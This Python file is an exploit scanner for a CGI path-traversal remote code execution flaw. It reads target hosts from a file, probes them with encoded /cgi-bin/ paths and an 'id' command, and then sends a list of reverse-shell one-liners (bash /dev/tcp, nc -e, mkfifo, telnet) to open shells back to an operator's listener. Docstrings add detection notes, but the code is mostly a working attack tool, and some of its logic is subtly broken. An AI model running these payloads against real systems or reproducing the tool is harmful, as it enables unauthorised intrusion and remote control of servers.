exploit2(notREADYyet).py
import urllib.request
import ssl
import sys
# Module-level mutable state shared by poc(), exp() and main().
# p_ip: base URLs for which poc() saw at least one matching response.
# e_ip: base URLs for which exp() saw a matching response; exp() appends once
#       per matching request line, so the same URL can appear more than once.
# Neither list is de-duplicated on insertion.
p_ip = []
e_ip = []
def poc(url):
    """Probe *url* for the CGI path-traversal condition and record a hit.

    One request is sent per entry in ``plugin_list``. Because a body is
    supplied, ``urllib`` issues a POST. *url* is recorded in the module-level
    ``p_ip`` when any response has status 200 and its body contains the
    substring ``"uid"``.

    Args:
        url: scheme plus host (and optional port), e.g. ``http://host:port``,
            without a trailing slash -- each path is concatenated directly.

    Returns:
        None. Side effect: may append *url* to the global ``p_ip``.

    Notes:
        * Every exception (timeouts, TLS failures, connection errors and the
          HTTPError ``urlopen`` raises for non-2xx responses) is swallowed,
          so an unreachable host is indistinguishable from an unaffected one.
        * The response object is never closed explicitly.
        * Detection: these request lines (URL-encoded dot segments under
          ``/cgi-bin/``) together with a body starting ``echo Content-Type:``
          are the observable signature of this probe in web-server, proxy
          and WAF logs.
    """
    # Variants of an encoded "." segment intended to escape the CGI
    # directory; the probe only cares whether any of them succeeds.
    plugin_list = [
        "/cgi-bin/.%%32%65",
        "/cgi-bin/%25%32%65",
        "/cgi-bin/%25%32%65%32%65",
        "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65",
        "/cgi-bin/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65",
    ]
    # Browser-like User-Agent; the UA alone is therefore not a useful indicator.
    headers = {"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1"}
    p_list = []
    for plugin_path in plugin_list:
        try:
            payload = url + plugin_path
            # Presence of a body makes this a POST request.
            data = bytes('echo Content-Type: text/plain; echo;id'.encode('utf-8'))
            req = urllib.request.Request(url=payload, headers=headers, data=data)
            res = urllib.request.urlopen(req, timeout=5)
            code = res.getcode()
            context = res.read()
            # A 200 whose body contains "uid" is taken as a positive result.
            if "uid" in context.decode('utf-8') and code == 200:
                p_list.append(payload)
        except Exception as e:
            # Deliberate best-effort: any failure is treated as "no hit".
            pass
    if len(p_list) > 0:
        p_ip.append(url)
def exp(url):
    """Re-run the poc() request set against *url* and print the responses.

    Uses the same request lines, headers and body as ``poc``. For every
    response with status 200 whose body contains ``"uid"``, the request line
    and the response body are stored and *url* is appended to the global
    ``e_ip`` (once per matching request line, so duplicates are possible).
    A summary is printed at the end.

    Args:
        url: scheme plus host (and optional port), without a trailing slash.

    Returns:
        None. Side effects: prints to stdout and may append to ``e_ip``.

    Notes:
        * Exceptions are swallowed exactly as in ``poc``.
        * The response object is never closed explicitly.
        * The log/WAF signature is identical to ``poc``'s.
    """
    plugin_list = [
        "/cgi-bin/.%%32%65",
        "/cgi-bin/%25%32%65",
        "/cgi-bin/%25%32%65%32%65",
        "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65",
        "/cgi-bin/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65/%25%32%65",
    ]
    headers = {"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1"}
    # Maps the full request URL to a string holding the response body.
    payload_lib = {}
    for plugin_path in plugin_list:
        try:
            payload = url + plugin_path
            # Presence of a body makes this a POST request.
            data = bytes('echo Content-Type: text/plain; echo;id'.encode('utf-8'))
            req = urllib.request.Request(url=payload, headers=headers, data=data)
            res = urllib.request.urlopen(req, timeout=5)
            code = res.getcode()
            context = res.read()
            if "uid" in context.decode('utf-8') and code == 200:
                payload_lib[payload] = "Echo: " + context.decode('utf-8')
                # Appended inside the loop: one entry per matching request line.
                e_ip.append(url)
        except Exception as e:
            # Deliberate best-effort: any failure is treated as "no hit".
            pass
    if len(payload_lib) > 0:
        print("RCE vulnerability found:")
        print("------------Payload-----------\n")
        for i in payload_lib:
            print("Request line: {}".format(i))
            print("Request body: echo Content-Type: text/plain; echo;id")
            # Newlines are stripped so each response prints on one line.
            print("{}".format(payload_lib[i]).replace("\n", ""))
            print()
        print("-" * 30)
    else:
        print("No RCE vulnerability found for the target\n")
def real_exploit(url, lhost, lport):
    """Send a fixed list of reverse-shell one-liners to the host at *url*.

    Each command is placed in the request body after the same
    ``echo Content-Type: text/plain; echo;`` prefix that ``poc``/``exp`` use,
    and the command itself is also appended to *url*. Responses (or a generic
    failure line) are printed per command.

    Args:
        url: target base URL as selected from ``e_ip`` in ``main``; its
            host and port parts are parsed into ``listen_ip``/``listen_port``.
        lhost: listener address entered by the operator in ``main``.
        lport: listener port entered by the operator in ``main``.

    Returns:
        None. Side effects: network requests and stdout output only.

    Notes:
        * Exceptions are caught per command and reported without the
          exception text, so the cause of a failure is not visible.
        * Detection/mitigation: a successful command produces an outbound
          TCP connection from the web-server process to an arbitrary
          host:port. Egress filtering for web-tier hosts and alerting on
          shells spawned by the HTTP/CGI process are the matching controls.
    """
    print("Executing commands on the victim's PC...")
    # Host and port are parsed from the target URL itself ("scheme://host:port/...").
    listen_ip = url.split("//")[1].split("/")[0].split(":")[0]
    listen_port = url.split("//")[1].split("/")[0].split(":")[1]
    commands = [
        'bash -i >& /dev/tcp/{}/{lport} 0>&1'.format(listen_ip, lport=listen_port),
        '0<&196;exec 196<>/dev/tcp/{}/{lport}; bash <&196 >&196 2>&196'.format(listen_ip, lport=listen_port),
        'exec 5<>/dev/tcp/{}/{lport}; cat <&5 | while read line; do $line 2>&5 >&5; done'.format(listen_ip, lport=listen_port),
        'bash -i 5<> /dev/tcp/{}/{lport} 0<&5 1>&5 2>&5'.format(listen_ip, lport=listen_port),
        'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {lhost} {lport} >/tmp/f'.format(lhost=lhost, lport=lport),
        'nc {lhost} {lport} -e bash'.format(lhost=lhost, lport=lport),
        'busybox nc {lhost} {lport} -e bash'.format(lhost=lhost, lport=lport),
        'nc -c bash {lhost} {lport}'.format(lhost=lhost, lport=lport),
        'TF=$(mktemp -u);mkfifo $TF && telnet {lhost} {lport} 0<$TF | bash 1>$TF'.format(lhost=lhost, lport=lport)
    ]
    for command in commands:
        try:
            payload = url + command
            data = bytes('echo Content-Type: text/plain; echo;{}'.format(command).encode('utf-8'))
            req = urllib.request.Request(url=payload, headers=headers, data=data)
            res = urllib.request.urlopen(req, timeout=5)
            code = res.getcode()
            context = res.read()
            print("Command: {}".format(command))
            print("Response:\n{}".format(context.decode('utf-8')))
            print()
        except Exception as e:
            # The exception is not printed; only a generic failure line.
            print("Command: {}".format(command))
            print("Failed to execute command")
            print()
def main():
    """Drive the scan: read targets, run poc() then exp(), then prompt.

    Workflow:
        1. Read one target per line from ``ip.txt`` (relative to the CWD).
        2. Run ``poc`` for each target over http and then https.
        3. Run ``exp`` over http and https for every distinct entry of ``p_ip``.
        4. If ``e_ip`` is non-empty, read a host index, listener IP and
           listener port from stdin and call ``real_exploit``.

    Returns:
        None. Exits via ``sys.exit()`` when the operator enters ``0``.

    Notes:
        * Numbering in the selection prompt follows ``e_ip`` as filled by
          ``exp``, which may contain the same URL more than once.
        * The listener IP/port read from stdin are not validated.
    """
    _ip = []  # unused
    with open("ip.txt", "r", encoding="utf-8") as f:
        iplib = f.readlines()
    i = 0
    print('Running poc detection...')
    for ip in iplib:
        i += 1
        try:
            # Trailing newline stripped; other surrounding whitespace is kept.
            url = "http://{}".format(ip.replace("\n", ""))
            print("Checking target {} [http]:".format(i))
            print(url)
            poc(url)
        except Exception as e:
            print('No vulnerabilities found for the target')
            print(e)
        try:
            print("Checking target {} [https]:".format(i))
            url = "https://{}".format(ip.replace("\n", ""))
            print(url)
            poc(url)
        except Exception as e:
            print('No vulnerabilities found for the target\n')
        print()
    # De-duplicate poc() hits; set ordering is arbitrary, so target numbering
    # below is not stable across runs.
    v_list = list(set(p_ip))
    print("-" * 30)
    print("-" * 30)
    print('Running exp detection...')
    n = 0
    for v in v_list:
        n += 1
        try:
            url = "http://{}".format(v)
            print("Checking target {} [http]:".format(n))
            print(url)
            exp(url)
        except Exception as e:
            print('No vulnerabilities found for the target')
            print(e)
        try:
            print("Checking target {} [https]:".format(n))
            url = "https://{}".format(v)
            print(url)
            exp(url)
        except Exception as e:
            print('No vulnerabilities found for the target\n')
    if len(e_ip) > 0:
        print('Number of hosts with RCE vulnerability: {}'.format(len(e_ip)))
        # Loop until a valid 1-based index (or 0 to exit) is entered.
        while True:
            host_num = input('Please select the host number to exploit (0 to exit): ')
            if host_num == '0':
                print('Exiting...')
                sys.exit()
            elif host_num.isnumeric() and int(host_num) in range(1, len(e_ip) + 1):
                host = e_ip[int(host_num) - 1]
                break
            else:
                print('Invalid input. Please try again.')
        lhost = input('Please enter the listener IP: ')
        lport = input('Please enter the listener port: ')
        print('Exploiting host: {}'.format(host))
        real_exploit(host, lhost, lport)
    else:
        print('No hosts with RCE vulnerability found.')
# Script entry point; all behaviour is driven by ip.txt and stdin prompts.
if __name__ == "__main__":
    main()